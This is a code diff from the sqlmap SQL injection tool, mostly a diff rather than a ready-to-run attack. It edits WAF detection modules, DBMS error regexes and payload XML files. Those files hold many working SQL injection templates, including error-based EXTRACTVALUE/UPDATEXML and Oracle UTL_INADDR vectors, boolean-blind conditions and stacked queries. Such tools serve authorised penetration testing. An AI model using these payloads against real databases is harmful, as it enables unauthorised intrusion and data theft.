@@ -66,7 +66,7 @@ class HashDB(object):
@staticmethod
def hashKey(key):
key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key)
retVal = int(hashlib.md5(key).hexdigest()[:12], 16)
retVal = int(hashlib.md5(key).hexdigest(), 16) & 0x7fffffffffffffff # Reference: http://stackoverflow.com/a/4448400
return retVal
def retrieve(self, key, unserialize=False):

3
lib/utils/search.py
View File

@@ -5,7 +5,6 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import cookielib
import httplib
import re
import socket
@@ -26,7 +25,6 @@ from lib.core.enums import HTTP_HEADER
from lib.core.enums import REDIRECTION
from lib.core.exception import SqlmapBaseException
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import DUMMY_SEARCH_USER_AGENT
from lib.core.settings import DUCKDUCKGO_REGEX
@@ -35,7 +33,6 @@ from lib.core.settings import GOOGLE_REGEX
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
from lib.core.settings import UNICODE_ENCODING
from lib.request.basic import decodePage
from lib.request.httpshandler import HTTPSHandler
from thirdparty.socks import socks

8
plugins/generic/databases.py
View File

@@ -572,7 +572,11 @@ class Databases:
query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(name.upper()))
else:
query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(name))
comment = unArrayizeValue(inject.getValue(query, blind=False, time=False))
if not isNoneValue(comment):
infoMsg = "retrieved comment '%s' for column '%s'" % (comment, name)
logger.info(infoMsg)
else:
warnMsg = "on %s it is not " % Backend.getIdentifiedDbms()
warnMsg += "possible to get column comments"
@@ -702,7 +706,11 @@ class Databases:
query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(column.upper()))
else:
query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column))
comment = unArrayizeValue(inject.getValue(query, union=False, error=False))
if not isNoneValue(comment):
infoMsg = "retrieved comment '%s' for column '%s'" % (comment, column)
logger.info(infoMsg)
else:
warnMsg = "on %s it is not " % Backend.getIdentifiedDbms()
warnMsg += "possible to get column comments"

3
sqlmap.py
View File

@@ -85,6 +85,7 @@ def main():
raise SystemExit
setPaths()
banner()
# Store original command line options for possible later restoration
cmdLineOptions.update(cmdLineParser().__dict__)
@@ -97,8 +98,6 @@ def main():
sys.stderr = StdDbOut(conf.taskid, messagetype="stderr")
setRestAPILog()
banner()
conf.showTime = True
dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True)
dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True)

2
tamper/commalesslimit.py
View File

@@ -5,10 +5,8 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
import re
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGH

3
tamper/escapequotes.py
View File

@@ -5,10 +5,7 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import base64
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOWEST

13
thirdparty/colorama/initialise.py vendored
View File

@@ -21,13 +21,15 @@ def reset_all():
def init(autoreset=False, convert=None, strip=None, wrap=True):
global wrapped_stdout, wrapped_stderr
global orig_stdout, orig_stderr
if orig_stdout is not None:
return
if not wrap and any([autoreset, convert, strip]):
raise ValueError('wrap=False conflicts with any other arg=True')
global wrapped_stdout, wrapped_stderr
global orig_stdout, orig_stderr
orig_stdout = sys.stdout
orig_stderr = sys.stderr
@@ -49,10 +51,15 @@ def init(autoreset=False, convert=None, strip=None, wrap=True):
def deinit():
global orig_stdout
global orig_stderr
if orig_stdout is not None:
sys.stdout = orig_stdout
orig_stdout = None
if orig_stderr is not None:
sys.stderr = orig_stderr
orig_stderr = None
@contextlib.contextmanager

2
waf/baidu.py
View File

@@ -18,7 +18,7 @@ def detect(get_page):
for vector in WAF_ATTACK_VECTORS:
_, headers, _ = get_page(get=vector)
retval = re.search(r"fhl", headers.get("X-Server", ""), re.I) is not None
retval |= re.search(r"yunjiasu-nginx", headers.get(HTTP_HEADER.SERVER), re.I) is not None
retval |= re.search(r"yunjiasu-nginx", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
if retval:
break

24
waf/nsfocus.py Normal file
View File

@@ -0,0 +1,24 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import HTTP_HEADER
from lib.core.settings import WAF_ATTACK_VECTORS
__product__ = "NSFOCUS Web Application Firewall (NSFOCUS)"
def detect(get_page):
retval = False
for vector in WAF_ATTACK_VECTORS:
_, headers, _ = get_page(get=vector)
retval = re.search(r"NSFocus", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
if retval:
break
return retval

125
xml/boundaries.xml
View File

@@ -31,6 +31,7 @@ Tag: <boundary>
6: TOP
7: Table name
8: Column name
9: Pre-WHERE (non-query)
A comma separated list of these values is also possible.
@@ -80,7 +81,7 @@ Formats:
<where>1,2</where>
<ptype>1</ptype>
<prefix>)</prefix>
<suffix></suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -89,7 +90,7 @@ Formats:
<where>1,2</where>
<ptype>2</ptype>
<prefix>')</prefix>
<suffix></suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -98,7 +99,7 @@ Formats:
<where>1,2</where>
<ptype>2</ptype>
<prefix>'</prefix>
<suffix></suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -107,7 +108,7 @@ Formats:
<where>1,2</where>
<ptype>4</ptype>
<prefix>"</prefix>
<suffix></suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<!-- End of generic boundaries -->
@@ -406,7 +407,7 @@ Formats:
<where>1,2</where>
<ptype>1</ptype>
<prefix></prefix>
<suffix>-- [RANDSTR]</suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -422,56 +423,92 @@ Formats:
<!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
<boundary>
<level>5</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
<level>4</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>1</ptype>
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
<level>4</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>4</ptype>
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
<level>4</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>1</ptype>
<prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>1</ptype>
<prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<!-- End of pre-WHERE generic boundaries -->
@@ -482,7 +519,7 @@ Formats:
<where>1,2</where>
<ptype>2</ptype>
<prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -491,7 +528,7 @@ Formats:
<where>1,2</where>
<ptype>2</ptype>
<prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -500,7 +537,7 @@ Formats:
<where>1,2</where>
<ptype>1</ptype>
<prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -509,7 +546,7 @@ Formats:
<where>1,2</where>
<ptype>2</ptype>
<prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -518,7 +555,7 @@ Formats:
<where>1,2</where>
<ptype>4</ptype>
<prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -527,7 +564,7 @@ Formats:
<where>1,2</where>
<ptype>1</ptype>
<prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -536,7 +573,7 @@ Formats:
<where>1</where>
<ptype>1</ptype>
<prefix>` WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
@@ -545,48 +582,10 @@ Formats:
<where>1</where>
<ptype>1</ptype>
<prefix>`) WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>-- </suffix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<!-- End of pre-WHERE derived table boundaries -->
<!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>1</ptype>
<prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<!-- End of INSERT/UPDATE generic boundaries -->
<!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
<boundary>
<level>4</level>

8
xml/errors.xml
View File

@@ -7,6 +7,7 @@
<error regexp="Warning.*mysql_.*"/>
<error regexp="MySqlException \(0x"/>
<error regexp="valid MySQL result"/>
<error regexp="check the manual that corresponds to your MySQL server version"/>
<error regexp="MySqlClient\."/>
<error regexp="com\.mysql\.jdbc\.exceptions"/>
</dbms>
@@ -31,6 +32,7 @@
<error regexp="\bSQL Server.*[0-9a-fA-F]{8}"/>
<error regexp="(?s)Exception.*\WSystem\.Data\.SqlClient\."/>
<error regexp="(?s)Exception.*\WRoadhouse\.Cms\."/>
<error regexp="Microsoft SQL Native Client.*[0-9a-fA-F]{8}"/>
</dbms>
<!-- Microsoft Access -->
@@ -43,7 +45,7 @@
<!-- Oracle -->
<dbms value="Oracle">
<error regexp="\bORA-[0-9][0-9][0-9][0-9]"/>
<error regexp="\bORA-\d{5}"/>
<error regexp="Oracle error"/>
<error regexp="Oracle.*Driver"/>
<error regexp="Warning.*\Woci_.*"/>
@@ -55,7 +57,7 @@
<error regexp="CLI Driver.*DB2"/>
<error regexp="DB2 SQL error"/>
<error regexp="\bdb2_\w+\("/>
<error regexp="(?i)SQLSTATE.+SQLCODE"/>
<error regexp="SQLSTATE.+SQLCODE"/>
</dbms>
<!-- Informix -->
@@ -87,7 +89,7 @@
<!-- Sybase -->
<dbms value="Sybase">
<error regexp="(?i)Warning.*sybase.*"/>
<error regexp="Warning.*sybase.*"/>
<error regexp="Sybase message"/>
<error regexp="Sybase.*Server message.*"/>
<error regexp="SybSQLException"/>

13
xml/payloads/01_boolean_blind.xml
View File

@@ -53,6 +53,7 @@ Tag: <test>
6: TOP
7: Table name
8: Column name
9: Pre-WHERE (non-query)
A comma separated list of these values is also possible.
@@ -159,7 +160,7 @@ Tag: <test>
<stype>1</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [INFERENCE]</vector>
<request>
@@ -175,7 +176,7 @@ Tag: <test>
<stype>1</stype>
<level>1</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [INFERENCE]</vector>
<request>
@@ -191,7 +192,7 @@ Tag: <test>
<stype>1</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR NOT [INFERENCE]</vector>
<request>
@@ -212,7 +213,7 @@ Tag: <test>
<vector>AND [INFERENCE]</vector>
<request>
<payload>AND [RANDNUM]=[RANDNUM]</payload>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
</request>
<response>
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
@@ -229,7 +230,7 @@ Tag: <test>
<vector>OR [INFERENCE]</vector>
<request>
<payload>OR [RANDNUM]=[RANDNUM]</payload>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
</request>
<response>
<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
@@ -246,7 +247,7 @@ Tag: <test>
<vector>OR NOT [INFERENCE]</vector>
<request>
<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
</request>
<response>
<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>

72
xml/payloads/02_error_based.xml
View File

@@ -7,7 +7,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
<request>
@@ -31,7 +31,7 @@
<stype>2</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
<where>1</where>
<vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
@@ -56,7 +56,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
<request>
@@ -80,7 +80,7 @@
<stype>2</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
<where>1</where>
<vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
@@ -105,7 +105,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
<request>
@@ -129,7 +129,7 @@
<stype>2</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
<where>1</where>
<vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
@@ -154,7 +154,7 @@
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request>
@@ -174,7 +174,7 @@
<stype>2</stype>
<level>4</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request>
@@ -194,7 +194,7 @@
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request>
@@ -219,7 +219,7 @@
<stype>2</stype>
<level>4</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request>
@@ -243,7 +243,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
<request>
@@ -268,7 +268,7 @@
<stype>2</stype>
<level>2</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
<request>
@@ -293,7 +293,7 @@
<stype>2</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
<request>
@@ -313,7 +313,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request>
@@ -332,7 +332,7 @@
<stype>2</stype>
<level>1</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request>
@@ -351,7 +351,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request>
@@ -372,7 +372,7 @@
<stype>2</stype>
<level>1</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request>
@@ -393,7 +393,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request>
@@ -414,7 +414,7 @@
<stype>2</stype>
<level>2</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request>
@@ -435,7 +435,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request>
@@ -454,7 +454,7 @@
<stype>2</stype>
<level>1</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request>
@@ -473,7 +473,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -493,7 +493,7 @@
<stype>2</stype>
<level>2</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -513,7 +513,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -532,7 +532,7 @@
<stype>2</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -551,7 +551,7 @@
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -570,7 +570,7 @@
<stype>2</stype>
<level>4</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -589,7 +589,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -608,7 +608,7 @@
<stype>2</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -655,7 +655,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
<request>
@@ -679,7 +679,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
<request>
@@ -703,7 +703,7 @@
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
<request>
@@ -727,7 +727,7 @@
<stype>2</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request>
@@ -747,7 +747,7 @@
<stype>2</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request>
@@ -771,7 +771,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request>
@@ -790,7 +790,7 @@
<stype>2</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request>

8
xml/payloads/04_stacked_queries.xml
View File

@@ -450,7 +450,7 @@
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request>
@@ -470,7 +470,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request>
@@ -571,7 +571,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
